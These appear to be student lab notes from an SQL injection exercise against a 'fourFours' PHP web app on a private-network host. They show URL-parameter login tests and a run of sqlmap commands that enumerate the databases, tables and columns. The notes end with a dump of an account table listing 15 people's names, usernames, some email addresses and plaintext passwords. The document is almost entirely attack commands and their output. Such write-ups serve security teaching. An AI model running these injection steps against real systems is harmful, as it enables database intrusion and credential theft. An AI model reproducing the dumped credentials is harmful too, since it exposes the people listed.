- Injecting directly into url:
  - this logs in:
    http://192.168.10.100/fourFours/index.php?operation=login&user=bigBoy&password=sdfdsfd
  - this doesn't
    http://192.168.10.100/fourFours/index.php?operation=login&user=haider&password=something
- sqlmap:
  - sqlmap -u "http://192.168.10.100/fourFours/index.php?operation=login&user=haider&password=something" --dbs
  - full terminal log for this command in sqlmap1.txt
  - this tells us the available databases are:
            available databases [3]:
            [*] information_schema
            [*] pg_catalog
            [*] public
  - sqlmap -u "http://192.168.10.100/fourFours/index.php?operation=login&user=haider&password=something" -D public --tables
  - full terminal log for this command in sqlmap2.txt
  - this gives us tables:
          +---------------+
          | account       |
          | fourfoursuser |
          | solution      |
          +---------------+
  - sqlmap -u "http://192.168.10.100/fourFours/index.php?operation=login&user=haider&password=something" -D public -T account --columns
  - full terminal log in sqlmap3.txt
  - gives us all columns for table 'account':
            +-----------+---------+
            | Column    | Type    |
            +-----------+---------+
            | id        | int4    |
            | firstname | varchar |
            | lastname  | varchar |
            | passwd    | varchar |
            | username  | varchar |
            +-----------+---------+
  - sqlmap -u "http://192.168.10.100/fourFours/index.php?operation=login&user=haider&password=something" -D public -T account -C id,firstname,lastname,passwd,username --dump
  - full terminal log in sqlmap4.txt
  - gives us all the information for all users in account table:
              [15 entries]
          +------+-----------+-------------+----------------+-----------------------+
          | id   | firstname | lastname    | passwd         | username              |
          +------+-----------+-------------+----------------+-----------------------+
          | 1    | Alex      | Large       | sdfdsfd        | bigBoy                |
          | 2    | Anne      | Lion        | lion           | anne                  |
          | 3    | Linda     | Swim        | fourfivesix    | lindah20              |
          | 4    | Abagail   | Silver      | silverisbetter | coins                 |
          | 5    | Jessie    | Burn        | password1      | matchstick            |
          | 6    | Annie     | Cup         | password       | coffee                |
          | 7    | Diane     | Bassell     | passw0rd       | ssll                  |
          | 8    | Steve     | Mountain    | cliff          | cliff                 |
          | 9    | Arnold    | Rosenbloom  | sdxfdsgger     | arnold@cs.toronto.edu |
          | 10   | Jay       | Perlmuter   | perl           | perl                  |
          | 11   | Peter     | Piper       | Peter          | pickApeck             |
          | 12   | Jen       | Binghampton | jbh            | hotel                 |
          | 13   | David     | Kleinman    | esrever        | dk@gmail.com          |
          | 14   | Jesse     | Kowalski    | badPassword    | eightball@gmail.com   |
          | 15   | Ivanna    | Grant       | grant          | ivanna                |
          +------+-----------+-------------+----------------+-----------------------+
